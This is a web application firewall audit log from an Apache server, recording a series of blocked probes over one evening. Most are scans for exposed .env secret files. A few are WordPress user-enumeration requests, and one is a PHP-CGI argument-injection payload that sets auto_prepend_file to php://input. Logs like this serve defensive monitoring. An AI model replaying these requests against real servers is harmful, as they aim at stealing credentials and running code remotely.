[msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749560434048106 1694 (- - -) Stopwatch2: 1749560434048106 1694; combined=942, p1=336, p2=587, p3=0, p4=0, p5=19, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1663352e-Z-- --cb674b3a-A-- [10/Jun/2025:20:09:27 +0700] aEguh2QJEkWdvAT5oU6dPQAAABc 103.236.140.4 43166 103.236.140.4 8181 --cb674b3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.138.238.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.138.238.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb674b3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb674b3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749560967414014 2171 (- - -) Stopwatch2: 1749560967414014 2171; combined=1105, p1=371, p2=708, p3=0, p4=0, p5=26, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb674b3a-Z-- --3b9c3653-A-- [10/Jun/2025:20:22:24 +0700] aEgxkGkffiosQXBbxVbjtAAAAM4 103.236.140.4 54332 103.236.140.4 8181 --3b9c3653-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.172.232.142 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.172.232.142 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3b9c3653-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b9c3653-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749561744427506 789 (- - -) Stopwatch2: 1749561744427506 789; combined=330, p1=295, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b9c3653-Z-- --0432ff39-A-- [10/Jun/2025:20:59:38 +0700] aEg6SmkffiosQXBbxVYf7gAAANI 103.236.140.4 32816 103.236.140.4 8181 --0432ff39-B-- GET /apps/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1; C6740N Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36 Accept-Charset: utf-8 --0432ff39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0432ff39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749563978392719 924 (- - -) Stopwatch2: 1749563978392719 924; combined=413, p1=368, p2=0, p3=0, p4=0, p5=45, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0432ff39-Z-- --b5362500-A-- [10/Jun/2025:21:17:51 +0700] aEg-j2kffiosQXBbxVY_hgAAAMg 103.236.140.4 57244 103.236.140.4 8181 --b5362500-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.245.156.33 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b5362500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5362500-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749565071970626 1233 (- - -) Stopwatch2: 1749565071970626 1233; combined=433, p1=379, p2=0, p3=0, p4=0, p5=54, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5362500-Z-- --f7170f62-A-- [10/Jun/2025:21:17:52 +0700] aEg-kJSz29O8wd7wtMtXCAAAAJM 103.236.140.4 57256 103.236.140.4 8181 --f7170f62-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.245.156.33 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f7170f62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7170f62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749565072057962 973 (- - -) Stopwatch2: 1749565072057962 973; combined=320, p1=289, p2=0, p3=0, p4=0, p5=31, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7170f62-Z-- --63c09a5c-A-- [10/Jun/2025:21:17:52 +0700] aEg-kDQZgo88hy0TiYxc1AAAAFA 103.236.140.4 57292 103.236.140.4 8181 --63c09a5c-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.245.156.33 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --63c09a5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63c09a5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749565072333560 962 (- - -) Stopwatch2: 1749565072333560 962; combined=362, p1=316, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63c09a5c-Z-- --080dc07c-A-- [10/Jun/2025:21:41:43 +0700] aEhEJ2kffiosQXBbxVZnDQAAAMw 103.236.140.4 54848 103.236.140.4 8181 --080dc07c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.34.246 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.34.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --080dc07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --080dc07c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749566503130328 854 (- - -) Stopwatch2: 1749566503130328 854; combined=369, p1=330, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --080dc07c-Z-- --c1115159-A-- [10/Jun/2025:21:51:34 +0700] aEhGdpSz29O8wd7wtMuGHQAAAIM 103.236.140.4 55506 103.236.140.4 8181 --c1115159-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-T580) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36 Accept-Charset: utf-8 --c1115159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1115159-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749567094186567 915 (- - -) Stopwatch2: 1749567094186567 915; combined=371, p1=330, p2=0, p3=0, p4=0, p5=40, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1115159-Z-- --88a25b5c-A-- [10/Jun/2025:21:52:04 +0700] aEhGlDQZgo88hy0TiYyLygAAAFg 103.236.140.4 58368 103.236.140.4 8181 --88a25b5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; CPH1823 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 Accept-Charset: utf-8 --88a25b5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88a25b5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749567124594095 762 (- - -) Stopwatch2: 1749567124594095 762; combined=372, p1=337, p2=0, p3=0, p4=0, p5=34, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88a25b5c-Z-- --578e8438-A-- [10/Jun/2025:22:07:01 +0700] aEhKFWkffiosQXBbxVaLlQAAAM8 103.236.140.4 60502 103.236.140.4 8181 --578e8438-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 157.245.156.33 Accept-Encoding: gzip X-Varnish: 177319743 --578e8438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --578e8438-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749568021401489 1138 (- - -) Stopwatch2: 1749568021401489 1138; combined=379, p1=341, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --578e8438-Z-- --e070d06d-A-- [10/Jun/2025:22:07:01 +0700] aEhKFWQJEkWdvAT5oU4smQAAABY 103.236.140.4 60526 103.236.140.4 8181 --e070d06d-B-- GET /sendgrid/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 157.245.156.33 Accept-Encoding: gzip X-Varnish: 177319749 --e070d06d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e070d06d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749568021530895 976 (- - -) Stopwatch2: 1749568021530895 976; combined=386, p1=351, p2=0, p3=0, p4=0, p5=35, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e070d06d-Z-- --b42f5c59-A-- [10/Jun/2025:22:07:01 +0700] aEhKFZSz29O8wd7wtMubTAAAAJE 103.236.140.4 60542 103.236.140.4 8181 --b42f5c59-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 157.245.156.33 Accept-Encoding: gzip X-Varnish: 177007604 --b42f5c59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b42f5c59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749568021642155 897 (- - -) Stopwatch2: 1749568021642155 897; combined=384, p1=344, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b42f5c59-Z-- --116e2634-A-- [10/Jun/2025:22:20:59 +0700] aEhNW5Sz29O8wd7wtMuvbgAAAIg 103.236.140.4 59362 103.236.140.4 8181 --116e2634-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 78.187.58.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.187.58.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --116e2634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --116e2634-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749568859675643 3076 (- - -) Stopwatch2: 1749568859675643 3076; combined=1797, p1=584, p2=1184, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --116e2634-Z-- --c63b4019-A-- [10/Jun/2025:22:21:20 +0700] aEhNcGQJEkWdvAT5oU5DUgAAABU 103.236.140.4 33278 103.236.140.4 8181 --c63b4019-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --c63b4019-C-- --c63b4019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c63b4019-E-- --c63b4019-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749568880441859 4015 (- - -) Stopwatch2: 1749568880441859 4015; combined=2619, p1=507, p2=2077, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c63b4019-Z-- --37ed4416-A-- [10/Jun/2025:23:04:11 +0700] aEhXe5Sz29O8wd7wtMvkNgAAAIw 103.236.140.4 51966 103.236.140.4 8181 --37ed4416-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.23.218.208 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.23.218.208 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --37ed4416-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37ed4416-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749571451818719 732 (- - -) Stopwatch2: 1749571451818719 732; combined=271, p1=238, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37ed4416-Z-- --af19c661-A-- [10/Jun/2025:23:21:06 +0700] aEhbcmQJEkWdvAT5oU6YsAAAAAE 103.236.140.4 36098 103.236.140.4 8181 --af19c661-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept-Charset: utf-8 --af19c661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af19c661-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749572466912943 754 (- - -) Stopwatch2: 1749572466912943 754; combined=324, p1=282, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af19c661-Z-- --99aa266b-A-- [10/Jun/2025:23:36:22 +0700] aEhfBjQZgo88hy0TiYwRVQAAAEo 103.236.140.4 42568 103.236.140.4 8181 --99aa266b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Accept-Charset: utf-8 --99aa266b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99aa266b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749573382555857 677 (- - -) Stopwatch2: 1749573382555857 677; combined=289, p1=235, p2=0, p3=0, p4=0, p5=54, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99aa266b-Z-- --ad56c811-A-- [10/Jun/2025:23:36:33 +0700] aEhfEWQJEkWdvAT5oU6oDAAAABg 103.236.140.4 43274 103.236.140.4 8181 --ad56c811-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --ad56c811-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad56c811-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749573393117014 795 (- - -) Stopwatch2: 1749573393117014 795; combined=342, p1=301, p2=0, p3=0, p4=0, p5=41, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
